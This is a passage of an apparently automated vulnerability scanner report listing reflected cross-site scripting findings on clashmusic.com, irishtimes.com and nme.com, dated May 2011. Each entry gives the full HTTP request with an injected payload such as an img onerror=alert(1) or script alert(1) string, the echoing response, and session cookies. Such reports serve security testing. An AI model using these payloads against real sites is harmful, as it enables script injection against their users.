<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user a a sidebar-right" id="page-user-a?f2cf1"><a>6d69f2fc0a7=1">
...[SNIP]...

3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><a>38bd166a4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userdd1c9"><a>38bd166a4a2/password HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-userdd1c9"><a>38bd166a4a2-password">
...[SNIP]...

3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 was submitted in the REST URL parameter 2. This input was echoed as 37226--><img src=a onerror=alert(1)>025ae694cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/password37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user password37226--><img src=a onerror=alert(1)>025ae694cc3 password37226-->
...[SNIP]...

3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 was submitted in the REST URL parameter 2. This input was echoed as 95d65"><img src=a onerror=alert(1)>93f2b1f87e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/password95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password95d65"><img src=a onerror=alert(1)>93f2b1f87e4 password95d65">
...[SNIP]...

3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b48f9"><a>a34f37c2a37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/password?b48f9"><a>a34f37c2a37=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password password sidebar-right" id="page-user-password?b48f9"><a>a34f37c2a37=1">
...[SNIP]...

3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e09ff"><a>cdd9a709dba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere09ff"><a>cdd9a709dba/register HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-usere09ff"><a>cdd9a709dba-register">
...[SNIP]...

3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 was submitted in the REST URL parameter 2. This input was echoed as 8d93b"><img src=a onerror=alert(1)>477a08ade76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/register8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:55 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register8d93b"><img src=a onerror=alert(1)>477a08ade76 register8d93b">
...[SNIP]...

3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 was submitted in the REST URL parameter 2. This input was echoed as 247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/register247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user register247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 register247ec-->
...[SNIP]...

3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d85"><a>f589e38414a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/register?25d85"><a>f589e38414a=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register register sidebar-right" id="page-user-register?25d85"><a>f589e38414a=1">
...[SNIP]...

3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/mostread/pagelog.cfm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81131<script>alert(1)</script>ed085a3f4e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=48949502.1304949673.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=48949502.1644454561.1304949660.1304949660.1304949660.1; __utmc=48949502; __utmb=48949502.1.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:19 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 417

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 was not found on this server.</P>
...[SNIP]...

3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbade<a>55573ebf5a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:00:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 267

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html was not found on this server.</P>
...[SNIP]...

3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31bfb<script>alert(1)</script>d6f7f03e726 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:09 GMT
Server: Apache
Set-Cookie: AuthCookie_test=test; domain=.irishtimes.com; path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html was not found on this server.</P>
...[SNIP]...

3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 98721<script>alert(1)</script>4401bc69c40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:10 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 was not found on this server.</P>
...[SNIP]...

3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /adcode/hot-spot.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5f92a-->a012285e929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adcode5f92a-->a012285e929/hot-spot.html?spot=1&channel=news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:05:22 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 631ed8fa777592278c3c121d623fe1939e0bd012"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3420"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0013279914855957"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:05:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
